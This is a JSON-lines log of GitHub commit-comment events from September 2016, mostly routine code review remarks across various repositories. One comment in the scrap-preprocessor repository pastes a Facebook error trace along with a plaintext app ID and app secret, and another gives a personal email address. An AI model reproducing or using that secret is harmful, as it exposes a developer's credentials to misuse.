{"id":"4613321264","type":"CommitCommentEvent","actor":{"login":"edgarAparicio"},"repo":{"name":"edgarAparicio/ejemploUbuntu"},"payload":{"comment":{"id":19161184,"position":4,"line":null,"path":"holaMundo.php","commit_id":"b0d19c7c430517248886802473c46f6f7af480e3","created_at":"2016-09-24T23:01:12Z","updated_at":"2016-09-24T23:01:12Z","body":"Probando git en iphone\n"}},"created_at":"2016-09-24T23:01:12Z"}
{"id":"4613322539","type":"CommitCommentEvent","actor":{"login":"fritteli"},"repo":{"name":"fritteli/gentoo-overlay"},"payload":{"comment":{"id":19161193,"position":null,"line":null,"path":null,"commit_id":"7382297ad0a13599b5af6d5cf5cc4ceced032d11","created_at":"2016-09-24T23:02:22Z","updated_at":"2016-09-24T23:02:22Z","body":"Cool, thanks for the hint! I'll look into that as soon as I find the time."}},"created_at":"2016-09-24T23:02:22Z"}
{"id":"4613323427","type":"CommitCommentEvent","actor":{"login":"jerryshaw12"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19161194,"position":null,"line":null,"path":null,"commit_id":"78ab22c81d13b4dc491855f6e4c647429c6c4b1d","created_at":"2016-09-24T23:03:08Z","updated_at":"2016-09-24T23:03:08Z","body":"could you allow 480dpi 5.5\" FHD shows date in single pull (small toggle)"}},"created_at":"2016-09-24T23:03:08Z"}
{"id":"4613323551","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19161195,"position":null,"line":null,"path":null,"commit_id":"12fb3171436f0de111960a91154806b8cc6135ac","created_at":"2016-09-24T23:03:14Z","updated_at":"2016-09-24T23:03:14Z","body":"@Phatcat\r\nsome q for example, where player should cast on self:\r\n\r\nSELECT entry FROM quest_template WHERE RewSpellCast IN (35076, 25716, 45437, 68474, 62021, 24962, 24963, 24964, 24965);"}},"created_at":"2016-09-24T23:03:14Z"}
{"id":"4613324823","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161200,"position":21,"line":79,"path":"Validation/HcalHits/src/HcalSimHitStudy.cc","commit_id":"bdcb5f63a27dcfbbd5fb1b92d5b52034d269bcf3","created_at":"2016-09-24T23:04:27Z","updated_at":"2016-09-24T23:04:27Z","body":"magic number here as well"}},"created_at":"2016-09-24T23:04:27Z"}
{"id":"4613325744","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161202,"position":33,"line":144,"path":"Validation/HcalHits/src/HcalSimHitStudy.cc","commit_id":"bdcb5f63a27dcfbbd5fb1b92d5b52034d269bcf3","created_at":"2016-09-24T23:05:13Z","updated_at":"2016-09-24T23:05:13Z","body":"Better to know why you use 82 and 72 (and define them to constant numbers with meaningful variable names."}},"created_at":"2016-09-24T23:05:13Z"}
{"id":"4613327618","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161207,"position":125,"line":297,"path":"Validation/HcalHits/src/HcalSimHitStudy.cc","commit_id":"bdcb5f63a27dcfbbd5fb1b92d5b52034d269bcf3","created_at":"2016-09-24T23:06:45Z","updated_at":"2016-09-24T23:06:45Z","body":"similarly, these 41, 82, and 72 numbers..."}},"created_at":"2016-09-24T23:06:45Z"}
{"id":"4613330378","type":"CommitCommentEvent","actor":{"login":"KnightDev"},"repo":{"name":"KnightDev/AdvancedBan"},"payload":{"comment":{"id":19161215,"position":null,"line":null,"path":null,"commit_id":"ade6922ac67e3de929f72f640da0f7923ec0c7c4","created_at":"2016-09-24T23:09:14Z","updated_at":"2016-09-24T23:09:14Z","body":"Listen here, my dude. I find it somewhat ridiculous that when other people fork this and make it their own, I see no activity from you, but I do it with intentions for PRIVATE use and integration, you hop on my case. If you have an issue you'd like to discuss, feel free to email me at calebplayzyt@gmail.com and I'll respond to you as soon as I'm able to. Otherwise, this discussion is going no-where. Thank you my dude. "}},"created_at":"2016-09-24T23:09:14Z"}
{"id":"4613331315","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":19161217,"position":null,"line":null,"path":null,"commit_id":"7fdfb99b1b27572f9fdecedb81d0e4eff8f3d71a","created_at":"2016-09-24T23:10:04Z","updated_at":"2016-09-24T23:10:04Z","body":"There was no reason to have it hold on to the hl registers in the previous commit, so remove those to avoid pointless stack use."}},"created_at":"2016-09-24T23:10:04Z"}
{"id":"4613331484","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19161218,"position":15,"line":37,"path":"android/jni/app-android.cpp","commit_id":"d325aa2b3094a0ae4bcb8362d4efd2da4ca23f66","created_at":"2016-09-24T23:10:11Z","updated_at":"2016-09-24T23:10:11Z","body":"@Orphis pointed out this should be `Core/Config.h` - can't verify it compiles with that fixed right now so just noting.\r\n\r\n-[Unknown]"}},"created_at":"2016-09-24T23:10:11Z"}
{"id":"4613332007","type":"CommitCommentEvent","actor":{"login":"kentquirk"},"repo":{"name":"AchievementNetwork/vasco"},"payload":{"comment":{"id":19161220,"position":null,"line":null,"path":null,"commit_id":"9dfe6732baf9254b7929ae7278c36801fcc68d04","created_at":"2016-09-24T23:10:37Z","updated_at":"2016-09-24T23:10:37Z","body":"I know this isn't up for a PR yet, but why not make all four of those targets dependents of a single target in the makefile, like:\r\n`ecr: ecr-login ecr-image ecs-register-task-def ecs-deploy`"}},"created_at":"2016-09-24T23:10:37Z"}
{"id":"4613332975","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161222,"position":91,"line":94,"path":"Validation/HcalHits/src/HcalSimHitsValidation.cc","commit_id":"7120ecd8068de1a3dca73d0f8529051982359423","created_at":"2016-09-24T23:11:25Z","updated_at":"2016-09-24T23:11:25Z","body":"I don't comment all of them, but please make change the 41 magic number to pre-defined constant."}},"created_at":"2016-09-24T23:11:25Z"}
{"id":"4613333954","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161224,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-24T23:12:16Z","updated_at":"2016-09-24T23:12:16Z","body":"Getting this error:\r\n\r\n09/24/2016 11:06:58 PM ERROR: Error loading information from facebook for INPS Classes\r\nTraceback (most recent call last):\r\n  File \"geocodertest.py\", line 252, in _repairFromGraph\r\n    search_result=self.graph.search(row['Name'],'place')\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 147, in search\r\n    response = self._query('GET', 'search', options, page, retry)\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 335, in _query\r\n    return self._query(method, path, data, page, retry - 1)\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 335, in _query\r\n    return self._query(method, path, data, page, retry - 1)\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 335, in _query\r\n    return self._query(method, path, data, page, retry - 1)\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 332, in _query\r\n    return load(method, url, data)[0]\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 288, in load\r\n    result = self._parse(response.content)\r\n  File \"/usr/local/lib/python2.7/dist-packages/facepy/graph_api.py\", line 403, in _parse\r\n    raise exception(**self._get_error_params(data))\r\nOAuthError: [190] Error validating access token: Session has expired on Saturday, 24-Sep-16 15:00:00 PDT. The current time is Saturday, 24-Sep-16 16:06:58 PDT.\r\n\r\n\r\n\r\n\r\nMy App ID: 1040517959329660\r\nSecret: c7e458dd968fca33d05a18fddbcd86ab"}},"created_at":"2016-09-24T23:12:16Z"}
{"id":"4613337462","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161231,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-24T23:15:28Z","updated_at":"2016-09-24T23:15:28Z","body":"What is the final stats? \r\n\r\nDid you cross verify to make sure all the returned objects are absolutely correct (at least 99%)?"}},"created_at":"2016-09-24T23:15:28Z"}
{"id":"4613337836","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161235,"position":null,"line":null,"path":null,"commit_id":"3b68d0d8dfdb93c200fa7ed47d8a8633cee8a38c","created_at":"2016-09-24T23:15:47Z","updated_at":"2016-09-24T23:15:47Z","body":"Awesome"}},"created_at":"2016-09-24T23:15:47Z"}
{"id":"4613338904","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161238,"position":28,"line":28,"path":"pokemap.py","commit_id":"638d188b47e14d08b2a6ca27b594144066c42131","created_at":"2016-09-24T23:16:51Z","updated_at":"2016-09-24T23:16:51Z","body":"what are these '.6f's for?"}},"created_at":"2016-09-24T23:16:51Z"}
{"id":"4613338995","type":"CommitCommentEvent","actor":{"login":"anadahz"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19161240,"position":4,"line":4,"path":"ChangeLog.md","commit_id":"e73a7b3d26b6d08882f34ccb6cba129bd92a0a48","created_at":"2016-09-24T23:16:56Z","updated_at":"2016-09-24T23:16:56Z","body":"I guess you meant rc3 (the latest ooniprobe RC).\r\nI made the proposed changes in 9bd344d and e24b00f."}},"created_at":"2016-09-24T23:16:56Z"}
{"id":"4613341201","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161246,"position":40,"line":40,"path":"test/test_pokemap.py","commit_id":"638d188b47e14d08b2a6ca27b594144066c42131","created_at":"2016-09-24T23:19:05Z","updated_at":"2016-09-24T23:19:05Z","body":"this is a decorator right? i'll have to read up on mock too"}},"created_at":"2016-09-24T23:19:05Z"}
{"id":"4613342769","type":"CommitCommentEvent","actor":{"login":"Zohnex"},"repo":{"name":"Zohnex/Poptropica"},"payload":{"comment":{"id":19161251,"position":null,"line":null,"path":null,"commit_id":"28e67413cad65b9e7a4644b69859134e922bddd4","created_at":"2016-09-24T23:20:31Z","updated_at":"2016-09-24T23:20:31Z","body":"Added Main Website Files"}},"created_at":"2016-09-24T23:20:31Z"}
{"id":"4613342972","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161252,"position":52,"line":86,"path":"fast_check.py","commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-24T23:20:42Z","updated_at":"2016-09-24T23:20:42Z","body":"this is so the returned list is sorted by poke index value in ascending order?"}},"created_at":"2016-09-24T23:20:42Z"}
{"id":"4613343406","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161253,"position":60,"line":89,"path":"fast_check.py","commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-24T23:21:09Z","updated_at":"2016-09-24T23:21:09Z","body":"im pretty lost at this point."}},"created_at":"2016-09-24T23:21:09Z"}
{"id":"4613344108","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161256,"position":69,"line":97,"path":"fast_check.py","commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-24T23:21:51Z","updated_at":"2016-09-24T23:21:51Z","body":"didn't realize you can access dict values this way. nice."}},"created_at":"2016-09-24T23:21:51Z"}
{"id":"4613344964","type":"CommitCommentEvent","actor":{"login":"fampton"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19161259,"position":null,"line":null,"path":null,"commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-24T23:22:45Z","updated_at":"2016-09-24T23:22:45Z","body":"very sleek, great stuff."}},"created_at":"2016-09-24T23:22:45Z"}
{"id":"4613345591","type":"CommitCommentEvent","actor":{"login":"madari"},"repo":{"name":"soniah/gosnmp"},"payload":{"comment":{"id":19161261,"position":null,"line":null,"path":null,"commit_id":"148d3d50f95c82cb9f59501f43bba16fbbca2db3","created_at":"2016-09-24T23:23:26Z","updated_at":"2016-09-24T23:23:26Z","body":"I agree that uint64 is the right type for the value, but I was afraid to make this change because this causes every application that is using counter64 values panic and crash due to the now invalid type assertion."}},"created_at":"2016-09-24T23:23:26Z"}
{"id":"4613345665","type":"CommitCommentEvent","actor":{"login":"tedeh"},"repo":{"name":"taoyuan/remjson"},"payload":{"comment":{"id":19161262,"position":72,"line":118,"path":"README.md","commit_id":"c691db0d3b650cee4ee6a20370bd187ec273b802","created_at":"2016-09-24T23:23:32Z","updated_at":"2016-09-24T23:23:32Z","body":"Beatiful"}},"created_at":"2016-09-24T23:23:32Z"}
{"id":"4613347309","type":"CommitCommentEvent","actor":{"login":"probonopd"},"repo":{"name":"fusion809/AppImages"},"payload":{"comment":{"id":19161268,"position":30,"line":23,"path":"recipes/netbeans/Recipe","commit_id":"1691c79cab5da1ca3df91365dd8c4c00399f236e","created_at":"2016-09-24T23:25:12Z","updated_at":"2016-09-24T23:25:12Z","body":"Don't use xenial since it is too new"}},"created_at":"2016-09-24T23:25:12Z"}
{"id":"4613347810","type":"CommitCommentEvent","actor":{"login":"whitecollar17"},"repo":{"name":"tidusjar/PlexRequests.Net"},"payload":{"comment":{"id":19161270,"position":8,"line":173,"path":"PlexRequests.UI/Views/Search/Index.cshtml","commit_id":"020ab0bc15ad2e1c90686376edc9eb4e5f00ba84","created_at":"2016-09-24T23:25:41Z","updated_at":"2016-09-24T23:25:41Z","body":"Its better to call it \"Not requested yet\""}},"created_at":"2016-09-24T23:25:41Z"}
{"id":"4613347920","type":"CommitCommentEvent","actor":{"login":"probonopd"},"repo":{"name":"fusion809/AppImages"},"payload":{"comment":{"id":19161272,"position":92,"line":49,"path":"recipes/netbeans/Recipe","commit_id":"1691c79cab5da1ca3df91365dd8c4c00399f236e","created_at":"2016-09-24T23:25:47Z","updated_at":"2016-09-24T23:25:47Z","body":"Use generate_appimage from functions.sh instead"}},"created_at":"2016-09-24T23:25:47Z"}
{"id":"4613348918","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19161278,"position":null,"line":null,"path":null,"commit_id":"4b81a24a0a37da68bf1f55240e676e6ba5887a1f","created_at":"2016-09-24T23:26:47Z","updated_at":"2016-09-24T23:26:47Z","body":" - __information__: [src/chaiscript_stdlib.cpp:0](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/chaiscript_stdlib.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 16 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:679](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/include/chaiscript/language/chaiscript_parser.hpp#L679) Expression is always false because 'else if' condition matches previous condition at line 677. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:683](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/include/chaiscript/language/chaiscript_parser.hpp#L683) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 683. (multiCondition)\n - __style__: [include/chaiscript/dispatchkit/boxed_value.hpp:248](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/include/chaiscript/dispatchkit/boxed_value.hpp#L248) 'operator=' should return reference to 'this' instance. (operatorEqRetRefThis)\n - __information__: [src/chaiscript_stdlib.cpp:1](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/chaiscript_stdlib.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __information__: [src/main.cpp:0](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 17 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __information__: [src/main.cpp:1](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __style__: [src/chaiscript_stdlib.cpp:18](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/chaiscript_stdlib.cpp#L18) The function 'create_chaiscript_module_chaiscript_stdlib' is never used. (unusedFunction)\n - __style__: [src/main.cpp:169](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L169) The function 'get_eval_error' is never used. (unusedFunction)\n - __style__: [src/main.cpp:140](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L140) The function 'help' is never used. (unusedFunction)\n - __style__: [src/main.cpp:216](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L216) The function 'myexit' is never used. (unusedFunction)\n - __style__: [src/main.cpp:158](../blob/4b81a24a0a37da68bf1f55240e676e6ba5887a1f/src/main.cpp#L158) The function 'throws_exception' is never used. (unusedFunction)\n"}},"created_at":"2016-09-24T23:26:47Z"}
{"id":"4613350965","type":"CommitCommentEvent","actor":{"login":"whitecollar17"},"repo":{"name":"tidusjar/PlexRequests.Net"},"payload":{"comment":{"id":19161285,"position":11,"line":176,"path":"PlexRequests.UI/Views/Search/Index.cshtml","commit_id":"020ab0bc15ad2e1c90686376edc9eb4e5f00ba84","created_at":"2016-09-24T23:28:53Z","updated_at":"2016-09-24T23:28:53Z","body":"suggestion:\r\nMemby make the bar orange and call it: Requested and in progress to watch.\r\n\r\n(and don't show \"Not Available\" tag when a tv show is requested)"}},"created_at":"2016-09-24T23:28:53Z"}
{"id":"4613351772","type":"CommitCommentEvent","actor":{"login":"MyRealityCoding"},"repo":{"name":"MyRealityCoding/braingdx"},"payload":{"comment":{"id":19161288,"position":null,"line":null,"path":null,"commit_id":"b430eb8eabd08da329aa94933f03d33a00d81334","created_at":"2016-09-24T23:29:40Z","updated_at":"2016-09-24T23:29:40Z","body":"This still doesn't completely work for shaders."}},"created_at":"2016-09-24T23:29:40Z"}
{"id":"4613352373","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19161290,"position":null,"line":null,"path":null,"commit_id":"bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0","created_at":"2016-09-24T23:30:12Z","updated_at":"2016-09-24T23:30:12Z","body":" - __information__: [src/chaiscript_stdlib.cpp:0](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 16 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:679](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L679) Expression is always false because 'else if' condition matches previous condition at line 677. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:683](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L683) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 683. (multiCondition)\n - __style__: [include/chaiscript/dispatchkit/boxed_value.hpp:248](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/dispatchkit/boxed_value.hpp#L248) 'operator=' should return reference to 'this' instance. (operatorEqRetRefThis)\n - __information__: [src/chaiscript_stdlib.cpp:1](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __information__: [src/main.cpp:0](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 17 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __information__: [src/main.cpp:1](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __style__: [src/chaiscript_stdlib.cpp:18](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L18) The function 'create_chaiscript_module_chaiscript_stdlib' is never used. (unusedFunction)\n - __style__: [src/main.cpp:169](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L169) The function 'get_eval_error' is never used. (unusedFunction)\n - __style__: [src/main.cpp:140](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L140) The function 'help' is never used. (unusedFunction)\n - __style__: [src/main.cpp:216](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L216) The function 'myexit' is never used. (unusedFunction)\n - __style__: [src/main.cpp:158](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L158) The function 'throws_exception' is never used. (unusedFunction)\n"}},"created_at":"2016-09-24T23:30:12Z"}
{"id":"4613354873","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19161292,"position":null,"line":null,"path":null,"commit_id":"bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0","created_at":"2016-09-24T23:32:22Z","updated_at":"2016-09-24T23:32:22Z","body":" - __information__: [src/chaiscript_stdlib.cpp:0](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 16 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:679](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L679) Expression is always false because 'else if' condition matches previous condition at line 677. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:683](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L683) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 683. (multiCondition)\n - __style__: [include/chaiscript/dispatchkit/boxed_value.hpp:248](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/include/chaiscript/dispatchkit/boxed_value.hpp#L248) 'operator=' should return reference to 'this' instance. (operatorEqRetRefThis)\n - __information__: [src/chaiscript_stdlib.cpp:1](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __information__: [src/main.cpp:0](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 17 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __information__: [src/main.cpp:1](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __style__: [src/chaiscript_stdlib.cpp:18](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/chaiscript_stdlib.cpp#L18) The function 'create_chaiscript_module_chaiscript_stdlib' is never used. (unusedFunction)\n - __style__: [src/main.cpp:169](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L169) The function 'get_eval_error' is never used. (unusedFunction)\n - __style__: [src/main.cpp:140](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L140) The function 'help' is never used. (unusedFunction)\n - __style__: [src/main.cpp:216](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L216) The function 'myexit' is never used. (unusedFunction)\n - __style__: [src/main.cpp:158](../blob/bec1b91b7beacbcaf672d77bfbe10ed57f02bdc0/src/main.cpp#L158) The function 'throws_exception' is never used. (unusedFunction)\n"}},"created_at":"2016-09-24T23:32:22Z"}
{"id":"4613355247","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19161294,"position":11,"line":185,"path":"autoload/neomake/utils.vim","commit_id":"b49189af6c3b098f6b7df5fc8232b7729bdcc17e","created_at":"2016-09-24T23:32:43Z","updated_at":"2016-09-24T23:32:43Z","body":"Also please create a new issue.\r\nI'd be happy to see a PR with a test to cover this of course.. :)"}},"created_at":"2016-09-24T23:32:43Z"}
{"id":"4613356804","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19161299,"position":null,"line":null,"path":null,"commit_id":"bb04ae6c5b332747876d345fcaa8413470450c68","created_at":"2016-09-24T23:34:17Z","updated_at":"2016-09-24T23:34:17Z","body":"Fixed again."}},"created_at":"2016-09-24T23:34:17Z"}
{"id":"4613357509","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161301,"position":null,"line":null,"path":null,"commit_id":"422d4acb4cc18ff983752163cbed8e4ceb10c2be","created_at":"2016-09-24T23:35:00Z","updated_at":"2016-09-24T23:35:00Z","body":"@KairusDarkSeeker I would love to get suggestions by you! You seem to be experienced with skins already! :)"}},"created_at":"2016-09-24T23:35:00Z"}
{"id":"4613358003","type":"CommitCommentEvent","actor":{"login":"dgraham"},"repo":{"name":"github/fetch"},"payload":{"comment":{"id":19161303,"position":5,"line":123,"path":"README.md","commit_id":"24b64da6e12a9daaa2114a1efabdf8472a06267a","created_at":"2016-09-24T23:35:31Z","updated_at":"2016-09-24T23:35:31Z","body":"Yes, `response.ok` is true for status codes in that range. See #341 for additional discussion."}},"created_at":"2016-09-24T23:35:31Z"}
{"id":"4613360413","type":"CommitCommentEvent","actor":{"login":"gcentauri"},"repo":{"name":"drexnexlo/giticky"},"payload":{"comment":{"id":19161313,"position":null,"line":null,"path":null,"commit_id":"293332e7838c4de578b6fec9d0aeae62ec218e1b","created_at":"2016-09-24T23:37:53Z","updated_at":"2016-09-24T23:37:53Z","body":"make a pull request!  turns out there is a command line way, the github website offers to teach you about it"}},"created_at":"2016-09-24T23:37:53Z"}
{"id":"4613368528","type":"CommitCommentEvent","actor":{"login":"hrydgard"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19161333,"position":15,"line":37,"path":"android/jni/app-android.cpp","commit_id":"d325aa2b3094a0ae4bcb8362d4efd2da4ca23f66","created_at":"2016-09-24T23:46:06Z","updated_at":"2016-09-24T23:46:06Z","body":"Fixed."}},"created_at":"2016-09-24T23:46:06Z"}
{"id":"4613369370","type":"CommitCommentEvent","actor":{"login":"hobbes7878"},"repo":{"name":"DallasMorningNews/html2canvas"},"payload":{"comment":{"id":19161336,"position":null,"line":null,"path":null,"commit_id":"d4b86bee024a85723d6235368052abe0882ba186","created_at":"2016-09-24T23:46:58Z","updated_at":"2016-09-24T23:46:58Z","body":"Fix for DallasMorningNews/chartwerk-editor#5"}},"created_at":"2016-09-24T23:46:58Z"}
